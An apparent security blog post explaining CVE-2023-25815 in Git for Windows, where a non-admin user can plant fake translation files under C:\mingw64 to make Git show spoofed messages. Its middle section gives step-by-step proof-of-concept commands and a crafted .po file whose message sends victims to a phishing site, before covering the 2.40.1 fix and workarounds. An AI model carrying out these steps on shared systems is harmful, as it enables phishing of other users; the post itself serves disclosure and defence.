In early 2023, a subtle but significant security flaw was found in Git for Windows, the popular Windows port of the Git version control system. This flaw, tracked as CVE-2023-25815, could let a local low-privilege user manipulate localized messages shown to other users of Git on the same system. While not a remote takeover exploit, this bug opens the door to misleading messages—potentially tricking users into risky actions, like visiting harmful websites, all by exploiting Windows folder permissions and a misconfigured message localization path.
Background: Git Localized Messages
Like many programs, Git can display messages in different languages (localization) through a system called gettext. On most platforms, Git uses a set of .mo (message object) files to display translated output. On Windows, the Git for Windows installer doesn't actually include any localized messages or .mo files, so by default Git runs in English and doesn't even try to localize output.
The Bug
Due to a change in the MINGW-packages, which Git for Windows uses to help with Unix-like compatibility, the gettext() function now looks for translation files in the hard-coded path:
C:\mingw64\share\locale
Instead of skipping localization entirely (as previous versions did), if this folder and files exist, Git for Windows tries to load localized message files from there.
Problem: By default, there is *no* C:\mingw64 on most computers, and *any* authenticated (non-admin) Windows user can create folders in C:\. This means a low-privileged user could create fake translation files in C:\mingw64\share\locale so Git picks up and shows their crafted messages.
Attack Scenario
Suppose two users share access to a company or family PC. User A (the attacker) creates specific folders and files to override Git's output. When User B runs git clone, they might see a manipulated message, such as:
> "Your repository has been cloned successfully. Please verify your credentials by visiting malicious-site.com."
Because the message appears as if it comes from Git, User B might trust it—and do something harmful.
As User A, run in Command Prompt
mkdir C:\mingw64\share\locale\en_US\LC_MESSAGES
2. Create a Malicious Translation File
You’ll need a compiled .mo translation file. Suppose you want to change the message “Cloning into '%s'...” to a phishing message. Here’s a minimal example using GNU gettext tools.
- Create a file called git.po
msgid "Cloning into '%s'..."
msgstr "Cloning into '%s'... Please visit http://evil.example.com for verification!"
- Compile it with msgfmt (e.g., using GNU gettext tools for Windows):
msgfmt git.po -o git.mo
- Place git.mo in the spoofed locale folder
copy git.mo C:\mingw64\share\locale\en_US\LC_MESSAGES\
rename git.mo git.mo # (Already named correctly)
3. Wait for the Victim to Run Git
When User B runs a Git command like git clone, Git will use the fake translation if their locale is set to en_US. The altered phishing message shows up:
Cloning into 'project'... Please visit http://evil.example.com for verification!
Social engineering: Messages look like they come from Git, which many developers trust.
- Persistence: Unless the folder is deleted or permissions are locked down, the attack can persist across reboots.
Patch and Workarounds
The Git team fixed this in Git for Windows 2.40.1 (release notes). Now, even if the rogue folder exists, Git won't accidentally load translations from there unless intentionally configured.
Original Advisory:
GitHub Security Advisory for CVE-2023-25815
Initial Report:
How Windows Directory Permissions Work:
Microsoft: Default Permissions in Windows
GNU gettext tools for Windows:
mlocati's Gettext .zip for Windows
Git for Windows Release Notes 2.40.1
Conclusion
CVE-2023-25815 is a great example of how a small configuration mistake—like a hardcoded folder path—can turn into a security problem, especially on multi-user systems. If you use Git for Windows, upgrade to the latest version, lock down your system, and be wary of strange messages. And if you ever see Git telling you to visit a web page, think twice before you click!
Timeline
Published on: 04/25/2023 20:15:00 UTC
Last modified on: 05/12/2023 05:15:00 UTC